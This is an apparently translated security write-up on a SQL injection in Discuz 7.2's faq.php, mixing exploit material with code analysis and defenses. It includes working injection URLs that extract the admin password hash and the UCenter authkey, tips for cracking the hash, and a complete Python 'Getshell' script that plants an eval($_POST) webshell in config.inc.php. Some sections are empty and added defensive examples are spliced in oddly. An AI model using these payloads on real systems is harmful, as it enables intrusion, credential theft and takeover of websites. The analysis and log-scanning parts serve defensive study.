
discuz /faq.php SQL Injection Vul

Date: 2021-07-01 10:21:17

Contents:

1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Code analysis
5. Defenses
6. Thoughts on attack and defense

 

1. Vulnerability description

1. Obtain the administrator password through the injection.
2. Crack the administrator password. Query the hash on cmd5.com; the salt has to be supplied with it, and the last digit "1" of the salt returned by the injection must be dropped.
   For example, the injection returns: admin:c6c45f444cf6a41b309c9401ab9a55a7:066ff71
   What has to be queried is: c6c45f444cf6a41b309c9401ab9a55a7:066ff7
3. Obtain a shell via uc_key.
4. Enter the admin backend and add a plugin to obtain a webshell.

Relevant Link:

1. http://sebug.net/vuldb/ssvid-87115
2. http://sebug.net/vuldb/ssvid-87114


2. Trigger conditions

1. Retrieve the database version
   http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
2. Retrieve the administrator account and password
   http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
3. Retrieve the key
   http://localhost/discuz7.2/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
   // the injected data is returned inside the MySQL error message (error-based injection)
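As an added example (not part of the original post or of Discuz), the following Python 3 scanner flags requests of the kind listed above in web-server access logs. It relies only on the property that every legitimate gids value is an integer, so a quote, a backslash or SQL text in that position is reported regardless of the exact payload. The log lines it parses are constructed for the example, with spaces in the request target %20-encoded as a server would record them.

```python
"""Flag faq.php?action=grouppermission requests whose gids values are not plain integers."""
import re
from urllib.parse import urlsplit, parse_qsl

# Request part of a combined-format access-log line, e.g. "GET /faq.php?... HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter names of the form gids[...] or gids[...][...]
GIDS_KEY_RE = re.compile(r"^gids(\[[^\]]*\])+$")

# Constructed sample log (not real traffic); spaces in the request target are %20-encoded
# as a web server records them.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jul/2021:10:21:17 +0800] "GET /discuz7.2/faq.php?action=grouppermission'
    '&gids[1]=2&gids[2]=3 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jul/2021:10:22:03 +0800] "GET /discuz7.2/faq.php?action=grouppermission'
    '&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),'
    'concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23'
    ' HTTP/1.1" 200 7311',
    '10.0.0.9 - - [01/Jul/2021:10:22:10 +0800] "GET /discuz7.2/viewthread.php?tid=1 HTTP/1.1" 200 9000',
]


def suspicious_gids(target):
    """Return (name, decoded value) for every gids parameter that is not a plain integer.

    The vulnerable loop keeps only $row[0] of each gids value, so legitimate requests carry
    small integers there; a quote, a backslash or SQL keywords in that position have no
    benign explanation and are exactly what the trigger URLs above send.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/faq.php"):
        return []
    params = parse_qsl(parts.query, keep_blank_values=True)   # also %-decodes the values
    if ("action", "grouppermission") not in params:
        return []
    return [(name, value) for name, value in params
            if GIDS_KEY_RE.match(name) and not re.fullmatch(r"\d+", value)]


def scan_log(lines):
    """Return (line number, parameter name, decoded value) for each suspicious gids parameter."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for name, value in suspicious_gids(match.group("target")):
                hits.append((number, name, value))
    return hits


if __name__ == "__main__":
    for number, name, value in scan_log(SAMPLE_LOG):
        print("line %d: %s = %r" % (number, name, value))
```

Run against the constructed log, only line 2 is reported, once for `gids[99]` (the lone quote) and once for `gids[100][0]` (the decoded subquery); the benign request with integer ids and the unrelated page produce nothing. Because the check is on the type of the value rather than on SQL keywords, encoding tricks that keep the payload non-numeric still trip it.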

0x1: POC

```python
import sys,urllib,time,math,base64,hashlib,urllib2
#contant raw
def fg(kaishi, jieshu, wenben):
    start = wenben.find(kaishi);
    if start >= 0:
        start += len(kaishi);
        jieshu = wenben.find(jieshu, start);
        if jieshu >= 0:
            return wenben[start:jieshu].strip();
#microtime
def microtime(get_as_float = False) :
    if get_as_float:
        return time.time();
    else:
        return '%.8f %d' % math.modf(time.time());
#authget
def get_authcode(string, key = ''):
    ckey_length = 4;
    key = hashlib.md5(key).hexdigest();
    keya = hashlib.md5(key[0:16]).hexdigest();
    keyb = hashlib.md5(key[16:32]).hexdigest();
    keyc = (hashlib.md5(microtime()).hexdigest())[-ckey_length:];
    #keyc = (hashlib.md5('0.736000 1389448306').hexdigest())[-ckey_length:]
    cryptkey = keya + hashlib.md5(keya+keyc).hexdigest();
    key_length = len(cryptkey);
    string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string;
    string_length = len(string);
    result = '';
    box = range(0, 256);
    rndkey = dict();
    for i in range(0,256):
        rndkey[i] = ord(cryptkey[i % key_length]);
    j=0;
    for i in range(0,256):
        j = (j + box[i] + rndkey[i]) % 256;
        tmp = box[i];
        box[i] = box[j];
        box[j] = tmp;
    a=0;
    j=0;
    for i in range(0,string_length):
        a = (a + 1) % 256;
        j = (j + box[a]) % 256;
        tmp = box[a];
        box[a] = box[j];
        box[j] = tmp;
        result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256]));
    return keyc + base64.b64encode(result).replace('=', '');
#getshell
def get_shell(url0,key,host):
    headers={'Accept-Language':'zh-cn',
             'Content-Type':'application/x-www-form-urlencoded',
             'User-Agent':'Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
             'Referer':url0
    };
    tm = time.time()+10*3600;
    tm="time=%d&action=updateapps" %tm;
    code = urllib.quote(get_authcode(tm,key));
    url0=url0+"?code="+code;
    data1='''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://xxx\');eval($_POST[qcmd]);//</item>
</root>''';
    try:
        req=urllib2.Request(url0,data=data1,headers=headers);
        ret=urllib2.urlopen(req);
    except:
        return "error to read";
    data2='''<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">http://aaa</item>
</root>''';
    try:
        req=urllib2.Request(url0,data=data2,headers=headers);
        ret=urllib2.urlopen(req);
    except:
        return "error";
    return "OK: "+host+"/config.inc.php | Password = qcmd"; # changed /config/uc_config.php to config.inc.php, by niubl
#define over
#url from users
right = len(sys.argv);
if right < 2:
    #note
    print ("============================================================");
    print ("Discuz <= 7.2 Getshell");
    print ("Wrote by Airbasic");
    print ("Usage: py.exe " + sys.argv[0] + " http://localhost/dz");
    print ("============================================================");
    raw_input("");
    sys.exit()
url = sys.argv[1];
#go
url1 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";
url2 = url + "/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23";
#authkey1~31
wy1 = urllib.urlopen(url1);
nr1 = wy1.read();
authkey1 = fg("'1:","' for",nr1);
#authkey32~64
wy2 = urllib.urlopen(url2);
nr2 = wy2.read();
authkey2 = fg("'1:","' for",nr2);
#authkey
authkey = authkey1+authkey2;
#get username and password
#none
#over
#get webshell
url0 = url + "/api/uc.php";
host = url;
print ("Wrote by Airbasic , GetShell Ok !");
print get_shell(url0,authkey,host);
raw_input("");
```

Relevant Link:

1. http://blog.csdn.net/yiyefangzhou24/article/details/36913287
2. http://qqhack8.blog.163.com/blog/static/11414798520146711246279/


3. Affected scope

4. Code analysis

/faq.php

```php
..
elseif($action == 'grouppermission')
{
..
// First define an array $groupids, then iterate over $gids (also an array: it is $_GET['gids'])
$groupids = array();
foreach($gids as $row)
{
    // Take the first element of every value in the array and store it in $groupids
    $groupids[] = $row[0];
    /*
    The security flaw is here.
    Discuz globally applies addslashes() to the GET array, so a single quote "'" becomes "\'".
    If the parameter we pass is gids[1]=', it is escaped to $gids[1]=\', and the assignment
    $groupids[] = $row[0] takes just the first character of that string, i.e. "\": the escape
    character is extracted on its own.
    */
}
/*
Before the data goes into the SQL statement, $groupids is processed once more by implodeids(),
which joins the $groupids array with ',' and returns a string such as '1','2','3','4'. But the
element we extracted is a lone escape character, which escapes the normal quote that follows it,
like this: '1','\','3','4'
The single quote that was meant to close the value is thereby escaped, so the attacker's injected
data "escapes" the quoting; that is the injection. Putting the error-producing statement in
position 3 makes the query throw the error.
*/
$query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");
$groups = array();
..
```

Relevant Link:

1. http://simeon.blog.51cto.com/18680/1440000


5. Defenses

/faq.php

```php
elseif($action == 'grouppermission')
{
    /* initialize $gids */
    $gids = array();
    /* */
```
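The following Python model is an added example, not Discuz code and not part of this post. It re-implements the three PHP steps from the code analysis (global addslashes(), the $row[0] slice, implodeids()) so that the effect of slicing an escaped string on the IN list can be observed without a database, and adds a small check that tells a sound id list from a broken one. The intval() coercion in the hardened variant is an illustrative extra defense assumed for this example; the patch shown above instead resets $gids before use.

```python
"""Model of the faq.php grouppermission flaw: addslashes() + $row[0] + implodeids().

Added example, not Discuz code: the three PHP steps are re-implemented in Python so the
effect of slicing an escaped string can be observed without a MySQL server.
"""
import re


def addslashes(s):
    """PHP addslashes(): backslash-escape backslash, single quote, double quote and NUL
    (Discuz applies it to all GET input)."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def first_element(row):
    """$row[0]: first array element for a nested array, first character for a string."""
    return row[0] if row else ""


def implodeids(ids):
    """Discuz implodeids(): joins ids into "'a','b','c'" (empty string for no ids)."""
    return "'" + "','".join(ids) + "'" if ids else ""


def vulnerable_in_clause(gids):
    """Text the vulnerable code places inside ... WHERE u.groupid IN (...)."""
    escaped = [[addslashes(x) for x in row] if isinstance(row, list) else addslashes(row)
               for row in gids]
    groupids = [first_element(row) for row in escaped]   # a lone "\" survives here
    return implodeids(groupids)


def intval(s):
    """PHP intval() for strings: leading integer, else 0."""
    m = re.match(r"\s*[+-]?\d+", s)
    return int(m.group()) if m else 0


def hardened_in_clause(gids):
    """Same flow with every id coerced to an integer before imploding.

    Illustrative extra defence assumed for this example; the page's own patch instead
    resets $gids before use. Group ids are integers, so non-numeric input carries no value.
    """
    groupids = [str(intval(first_element(row))) for row in gids]
    return implodeids(groupids)


def unquoted_text(fragment):
    """Split a MySQL fragment at single-quoted literals, honouring backslash escapes.

    Returns (characters outside any literal, whether a literal is left unterminated).
    A doubled quote inside a literal is treated as close-then-open, which leaves the
    outside text unchanged.
    """
    outside, in_str, i = [], False, 0
    while i < len(fragment):
        c = fragment[i]
        if in_str:
            if c == "\\":
                i += 1              # skip the escaped character
            elif c == "'":
                in_str = False
        elif c == "'":
            in_str = True
        else:
            outside.append(c)
        i += 1
    return "".join(outside), in_str


def id_list_is_sound(fragment):
    """A well-formed id list has only commas between the quotes and no open literal."""
    outside, dangling = unquoted_text(fragment)
    return not dangling and set(outside) <= {","}


if __name__ == "__main__":
    # Constructed input mirroring the trigger: the second group id is a lone single quote.
    demo = ["1", "'", "3"]
    for label, clause in (("vulnerable", vulnerable_in_clause(demo)),
                          ("hardened", hardened_in_clause(demo))):
        outside, dangling = unquoted_text(clause)
        print("%-10s IN (%s)  outside quotes=%r  unterminated=%s  sound=%s"
              % (label, clause, outside, dangling, id_list_is_sound(clause)))
```

With the constructed input the vulnerable path yields `'1','\','3'`: the tokenizer sees the characters `,3` outside any literal and a literal that never closes, which is exactly the position-3 escape the analysis describes. The hardened path yields `'1','0','3'`, where only commas sit between the quotes. The general lesson is that a global escaping pass is not a validation step: any later code that slices, truncates or re-encodes the escaped value can undo it, so ids should be type-checked where they are consumed.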

Relevant Link:

1. http://www.crazydb.com/archive/Discuz7.xSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8EEXP
2. http://simeon.blog.51cto.com/18680/1440000


6. Thoughts on attack and defense

Copyright (c) 2015 LittleHann All rights reserved

 
